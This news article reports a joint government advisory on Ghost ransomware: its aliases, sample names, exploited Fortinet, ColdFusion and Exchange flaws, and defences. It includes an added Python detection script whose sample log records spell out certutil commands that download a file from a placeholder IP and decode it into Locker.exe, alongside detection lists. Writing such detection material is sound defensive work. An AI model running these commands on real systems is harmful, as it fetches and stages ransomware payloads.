Wednesday, March 26, 2025

Ghost ransomware breached orgs in 70 nations

CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations.

Other industries impacted include healthcare, government, education, technology, manufacturing, and numerous small and medium-sized businesses.

“Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware,” CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory released on Wednesday.

“This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China.”

Ghost ransomware operators frequently rotate their malware executables, change the file extensions of encrypted files, alter the contents of their ransom notes, and use multiple email addresses for ransom communications, which has often led to fluctuating attribution of the group over time.

Names linked to this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture, with ransomware samples used in their attacks including Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

This financially motivated ransomware group leverages publicly available code to exploit security flaws in vulnerable servers. They target vulnerabilities left unpatched in Fortinet (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).

To defend against Ghost ransomware attacks, network defenders are advised to take the following measures:

  1. Make regular and off-site system backups that can’t be encrypted by ransomware,
  2. Patch operating system, software, and firmware vulnerabilities as soon as possible,
  3. Focus on security flaws targeted by Ghost ransomware (i.e., CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207),
  4. Segment networks to limit lateral movement from infected devices,
  5. Implement phishing-resistant multi-factor authentication (MFA) for all privileged accounts and email services accounts.

Right after Amigo_A and Swisscom’s CSIRT team first spotted Ghost ransomware in early 2021, its operators were dropping custom Mimikatz samples, followed by CobaltStrike beacons, and deploying ransomware payloads using the legitimate Windows CertUtil certificate manager to bypass security software.
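The CertUtil abuse described above is the kind of living-off-the-land behaviour a defender can hunt for in process-creation telemetry, and the sample file names listed earlier (Cring.exe, Ghost.exe, ElysiumO.exe, Locker.exe) give a weaker, name-based signal. The script below is an added example, not code from the article or from the CISA/FBI/MS-ISAC advisory: it triages a few constructed process-creation records (pipe-delimited, a format assumed for this example) and flags certutil.exe runs that use download or decode switches, plus any image or argument whose file name matches a listed sample name. The certutil switches are real; the choice to treat them as suspicious is this example's assumption, and the hosts, paths and IP address in the records are made up.

```python
"""Triage constructed Windows process-creation records for two signals the
article describes: certutil.exe used to fetch or decode a payload, and the
ransomware executable names the advisory lists. Added example, not part of
the article or the advisory; record format and sample data are constructed."""

# File names the article lists for Ghost ransomware samples. Name matches are
# a weak signal on their own, since the article notes the group rotates its
# executables frequently.
GHOST_SAMPLE_NAMES = {"cring.exe", "ghost.exe", "elysiumo.exe", "locker.exe"}

# certutil.exe switches that have nothing to do with managing certificates on a
# workstation and are commonly used to download or decode files. These are
# real switches; flagging them is this example's assumption.
CERTUTIL_ABUSE_SWITCHES = {"-urlcache", "-decode", "-encode", "-verifyctl"}

# Constructed records: timestamp|host|image path|command line. The host names,
# paths and the 203.0.113.5 address (a documentation-range IP) are made up.
CONSTRUCTED_EVENTS = [
    "2025-01-14T02:11:09Z|SRV-EXCH01|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -urlcache -split -f http://203.0.113.5/l.txt C:\\Users\\Public\\l.txt",
    "2025-01-14T02:11:40Z|SRV-EXCH01|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -decode C:\\Users\\Public\\l.txt C:\\Users\\Public\\Locker.exe",
    "2025-01-14T02:12:03Z|WS-042|C:\\Users\\Public\\Locker.exe|Locker.exe",
    "2025-01-14T02:15:27Z|WS-017|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -dump C:\\Temp\\corp-root.cer",
    "2025-01-14T02:16:00Z|WS-042|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
]


def file_name(path):
    """Return the lower-cased final path component, tolerating both slash styles."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].strip('"').lower()


def classify_event(image, command_line):
    """Return a list of finding strings for one process-creation event."""
    findings = []
    exe = file_name(image)
    tokens = command_line.split()

    # Signal 1: certutil.exe invoked with a download/decode switch. Windows
    # accepts both '-' and '/' as the switch prefix, so normalise to '-'.
    if exe == "certutil.exe":
        switches = {"-" + t.lstrip("-/").lower() for t in tokens if t[:1] in "-/"}
        for sw in sorted(switches & CERTUTIL_ABUSE_SWITCHES):
            findings.append(f"certutil.exe run with {sw}")

    # Signal 2: the image itself, or any file referenced on the command line,
    # carries one of the sample names from the advisory.
    names = {exe} | {file_name(t) for t in tokens}
    for n in sorted(names & GHOST_SAMPLE_NAMES):
        findings.append(f"known Ghost sample name: {n}")
    return findings


def parse_event(line):
    """Split one pipe-delimited record into its four fields."""
    ts, host, image, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "image": image, "cmd": cmd}


def triage(lines):
    """Return only the events that produced findings, with the findings attached."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        findings = classify_event(ev["image"], ev["cmd"])
        if findings:
            hits.append({"ts": ev["ts"], "host": ev["host"], "image": ev["image"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in triage(CONSTRUCTED_EVENTS):
        print(f"{hit['ts']} {hit['host']} {hit['image']}")
        for f in hit["findings"]:
            print(f"    - {f}")
```

Run against the constructed records, three of the five events are flagged: the download, the decode (which also names Locker.exe as its output), and the launch of Locker.exe itself; the certificate dump and the svchost start are left alone. The behavioural check on certutil.exe is the part worth carrying into a real rule, because it survives the executable renaming the article describes.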

In addition to being exploited for initial access in Ghost ransomware attacks, the CVE-2018-13379 vulnerability was also targeted by state-backed hacking groups that scanned for vulnerable Fortinet SSL VPN appliances.

Attackers also abused the same security vulnerability to breach Internet-exposed U.S. election support systems.

Fortinet warned customers to patch their SSL VPN appliances against CVE-2018-13379 multiple times, in August 2019, July 2020, November 2020, and again in April 2021.

The joint advisory issued by CISA, the FBI, and MS-ISAC today also includes indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs), and detection methods linked to previous Ghost ransomware activity identified during FBI investigations as recently as January 2025.
